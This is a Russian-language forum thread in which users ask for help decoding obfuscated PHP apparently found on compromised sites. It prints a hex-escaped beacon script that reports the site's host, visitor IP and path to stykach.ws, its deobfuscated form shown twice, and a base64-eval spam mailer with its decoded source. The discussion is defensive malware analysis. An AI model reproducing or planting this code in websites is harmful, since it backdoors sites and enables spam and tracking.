<? $x13="\x64i\162n\x61m\145"; $x14="fil\x65"; $x15="\155\153d\x69r"; $x16="\165\156\154i\156\153";
$x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157 \x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\ 162:\x23\146ff}\074/\163\164yl\x65\076"; $x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\04 6\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
<? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6 e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6f l\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>

Подскажите что тут за хитрожопость зашифрована

на лицо довольно грубый метод обфускации.
раскодируй строковые литералы, по смыслу переименуй переменные и получишь читаемый код. к тому же он тут крайне простой, чтобы что-то напутать

<?php
if("no"=='ok') {
mkdir("test_ok",0777);
}
echo "<style>body{font-size:0px;color:#fff}</style>";
$ips = array('127.0.0.1');
foreach ($ips as $ip) {
if($ip==$_SERVER['REMOTE_ADDR']) {

} else {
if($_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){

} else {
$x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
unlink('rss_taib.png');
}
}
}?>
<? echo "<style>body{font-size:0px;color:#fff}</style>";?>

<?php
if("no"=='ok') {
mkdir("test_ok",0777);
}
echo "<style>body{font-size:0px;color:#fff}</style>";
$ips = array('127.0.0.1');
foreach ($ips as $ip) {
if($ip==$_SERVER['REMOTE_ADDR']) {

} else {
if($_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){

} else {
$x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
unlink('rss_taib.png');
}
}
}?>
<? echo "<style>body{font-size:0px;color:#fff}</style>";?>

а можно узнать чем расшифровал?
да и я не слишком силён в php этот код просто отправляет данные о сайте или ещё чтото?

Увидил в теме что-то похожее. Спрошу тут. Обясните что за "кодировка" эти /x00/x01/x04/x05/ и как работакр с такими строками, как они называются, что мне гуглить, курить. Можно в лс:)

Vlad&slav

гугли 16-ричную систему счисления

расшифровать нужно код :rolleyes:

<?php eval(base64_decode('JHRleHQgPSAkX1BPU1RbInRleHQiXT sgDQokZnJvbSA9ICRfUE9TVFsib3Rrb2dvIl07IA0KJHRvID0g JF9QT1NUWydlbWFpbCddOyANCiRzdWJqID0gJF9QT1NUWyJ0ZW 1hIl07IA0KJGJvZHkgPSAiJHRleHQiOyANCiRmcm9tPSJGcm9t OiAkZnJvbVxuUmVwbHktVG86ICRmcm9tXG5YLVByaW9yaXR5Oi AxXG5Db250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1c ImtvaTgtclwiXG5Db250ZW50LVRyYW5zZmVyLUVuY29kaW5nOi A4Yml0IjsgIA0KJGZyb209Y29udmVydF9jeXJfc3RyaW5nKCRm cm9tLCJ3IiwiayIpOyAgDQokdG89Y29udmVydF9jeXJfc3RyaW 5nKCR0bywidyIsImsiKTsgIA0KJHN1Ymo9Y29udmVydF9jeXJf c3RyaW5nKCRzdWJqLCJ3IiwiayIpOyAgDQokYm9keT1jb252ZX J0X2N5cl9zdHJpbmcoJGJvZHksInciLCJrIik7ICANCm1haWwo JHRvLCRzdWJqLCRib2R5LCRmcm9tKTsgIA==')); ?>

расшифровать нужно код


<?php
$text = $_POST["text"]; $from = $_POST["otkogo"]; $to = $_POST['email']; $subj = $_POST["tema"]; $body = "$text"; $from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/html; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; $from=convert_cyr_string($from,"w","k"); $to=convert_cyr_string($to,"w","k"); $subj=convert_cyr_string($subj,"w","k"); $body=convert_cyr_string($body,"w","k"); mail($to,$subj,$body,$from);
?>